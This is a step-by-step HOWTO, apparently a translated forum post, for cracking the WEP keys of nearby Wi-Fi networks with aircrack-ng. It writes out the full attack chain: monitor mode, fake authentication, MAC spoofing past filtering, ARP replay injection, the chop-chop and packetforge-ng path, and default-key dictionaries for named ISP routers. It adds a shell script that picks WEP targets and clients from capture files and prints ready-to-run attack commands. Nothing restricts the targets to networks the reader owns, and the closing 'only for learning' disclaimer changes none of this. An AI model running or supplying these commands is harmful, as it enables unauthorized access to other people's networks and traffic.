In this part I'll show you how to get a WEP key.
First, open a terminal and type:
sudo airmon-ng start wlan0 (or your interface)
A message will appear listing four or five processes that could interfere; ignore it for now. It will also say that monitor mode is enabled on mon0, and that is the interface we will use from here on.
Scan for networks:
sudo airodump-ng mon0
Once at least one network with WEP encryption (ENC column) has shown up, press Ctrl+C.
Choose one network (WEP)
And type:
sudo airodump-ng --bssid 00:12:59:A7:B9:93 -c 2 -w package mon0 ("package" can be any name you wish)
--bssid is the MAC address of the network, -c the channel, -w the prefix of the capture file and mon0 the interface. This window must stay open until the end.
The MAC addresses listed below the network are clients connected to it. Having one makes things easier, because the ARP replay attack used later needs traffic from a connected client.
Open a new tab: File>>Open new tab.
And type, for the fake authentication (-a is the MAC of the network, -h the MAC of your own card):
sudo aireplay-ng -1 0 -a MAC of the network -h MAC of your computer mon0
You should see:
Authentication successful :)
or something like that. If we don't get this message, we try again until it succeeds. Sometimes the router has MAC filtering, so we have to change our MAC address to that of a connected client:
sudo ifconfig mon0 down
sudo macchanger -m MAC of the client mon0
sudo ifconfig mon0 up
Try to authenticate again and, once it succeeds, type:
sudo aireplay-ng -3 -b MAC of the network -c MAC of the client -h MAC of your computer mon0
This is the ARP request replay attack: it re-injects the client's ARP requests so the access point keeps generating new IVs. It will take a while, so sit back and relax.
When we have more than 20,000 data packets (the #Data column in the airodump-ng window), open a new tab and type:
sudo aircrack-ng package-01.cap
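Picking the BSSID, channel and client by eye from the airodump-ng window is error-prone, so here is an added example (my own script, not part of the original HOWTO) that reads the CSV airodump-ng writes next to the capture (package-01.csv for -w package), lists the WEP networks with their IV count, finds the clients associated with one of them and prints the airodump-ng/aireplay-ng lines from this HOWTO filled in for that target. The CSV layout assumed is airodump-ng's (an access-point table, a blank line, then a station table); the sample CSV, the BSSIDs and the MAC 00:11:22:33:44:55 are constructed for the demo and are not from a real capture.

```shell
#!/bin/sh
# Added example, not part of the original HOWTO: turn the airodump-ng CSV
# (written next to the .cap when you use -w) into target lists and command
# lines.  Column layout assumed: airodump-ng's AP table, blank line, station
# table.  Sample data below is constructed, not a real capture.

# Print "BSSID channel IVs ESSID" for every access point whose Privacy column
# mentions WEP.  IVs here is the "# IV" column, i.e. #Data in the live view.
wep_targets() {
    awk -F',' '
        /^Station MAC/ { exit }                 # station table starts: stop
        NR > 1 && NF >= 14 {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)   # trim padding
            if ($6 ~ /WEP/) print $1, $4, $11, $14
        }' "$1"
}

# Print the MAC of every station whose BSSID column equals the given AP.
clients_of() {
    awk -F',' -v ap="$2" '
        /^Station MAC/ { in_sta = 1; next }
        in_sta && NF >= 6 {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if ($6 == ap) print $1
        }' "$1"
}

# Print the commands from the HOWTO for one target: capture on its channel,
# fake-authenticate, then ARP-replay against the first associated client.
# With no client seen, say so (that is the chop-chop case).
attack_plan() {
    csv=$1; ap=$2; mymac=$3
    chan=$(wep_targets "$csv" | awk -v ap="$ap" '$1 == ap { print $2; exit }')
    client=$(clients_of "$csv" "$ap" | head -n 1)
    echo "sudo airodump-ng --bssid $ap -c $chan -w package mon0"
    if [ -n "$client" ]; then
        echo "sudo aireplay-ng -1 0 -a $ap -h $mymac mon0"
        echo "sudo aireplay-ng -3 -b $ap -c $client -h $mymac mon0"
    else
        echo "# no client associated with $ap: use the chop-chop path (aireplay-ng -4)"
    fi
}

# Constructed sample in the airodump-ng CSV layout (not a real capture).
make_sample_csv() {
    cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:59:A7:B9:93, 2012-01-01 10:00:00, 2012-01-01 10:05:00,  2,  54, WEP , WEP, , -40,  120,  35,   0.  0.  0.  0,   7, WLAN_7E,
00:1A:2B:3C:4D:5E, 2012-01-01 10:00:00, 2012-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -60,   80,   0,   0.  0.  0.  0,   6, MyHome,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:24:2B:11:22:33, 2012-01-01 10:01:00, 2012-01-01 10:05:00, -50,  300, 00:12:59:A7:B9:93, WLAN_7E
00:26:5E:44:55:66, 2012-01-01 10:01:00, 2012-01-01 10:05:00, -70,   10, (not associated) ,
EOF
}

# Stand-alone demo: "sh wep-targets.sh demo" (script name is an assumption).
demo() {
    f=$(mktemp)
    make_sample_csv "$f"
    echo "WEP networks (BSSID channel IVs ESSID):"; wep_targets "$f"
    echo "Plan for 00:12:59:A7:B9:93 with our MAC 00:11:22:33:44:55:"
    attack_plan "$f" 00:12:59:A7:B9:93 00:11:22:33:44:55
    rm -f "$f"
}
case "${1:-}" in demo) demo ;; esac
```

On a real run replace the sample with `wep_targets package-01.csv`; the IV column tells you how far you are from the 20,000 data packets aircrack-ng usually needs, and an empty `clients_of` result is the signal to switch to the clientless method described further down.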
If you want to make it faster, you can create a dictionary based on the network's ESSID (these tools generate the default keys such routers ship with):
WLAN_XX -----> wlandecypter
ONOXXXX-------> ono4xx
JAZZTEL_XX ------> jazzteldecrypter
(there are more, but these ESSIDs are the most common)
If you want to install these programs, they are in the "Wifi" repositories; just search for them in Y-PPA-Manager.
With the dictionary created, type:
sudo aircrack-ng package-01.cap -w path to the dictionary
But what happens if there are no connected clients? Then we do a chop-chop attack.
Do the same as before up to the line:
sudo airodump-ng --bssid 00:12:59:A7:B9:93 -c 2 -w captura mon0
Open a new tab and type (the 10 is the reassociation interval in seconds):
sudo aireplay-ng -1 10 -e ESSID -a MAC of the network -h your MAC mon0
Then open another tab:
sudo aireplay-ng -4 -h your MAC mon0
(add -b MAC of the network if you want it to target that access point directly instead of asking you)
When it finishes you will have two files, named replay_dec-...:
*.xor (the recovered keystream)
*.cap (the decrypted packet)
If that went right, read the decrypted packet with:
tcpdump -s 0 -n -e -r FILE.CAP
This shows you the IP addresses in use on the network, so type:
packetforge-ng -0 -a MAC of the network -h your MAC -k IP -l IP -y FILE.XOR -w PACKAGE
(-k is the destination IP and -l the source IP; 255.255.255.255 works for both if you could not read them)
We have created an ARP request packet, so:
aireplay-ng -2 -x 1024 -h your MAC -r ARP FILE mon0
*1024 is the injection rate in packets per second and only an example; if it doesn't work, try 300, then 400, 500... up to 1024.
Then, when you have a lot of packets, type:
aircrack-ng *.cap
***The dictionary also works in this case, so create it and you will need fewer IVs.
I'm not responsible for the use of this HOWTO; it is only for learning.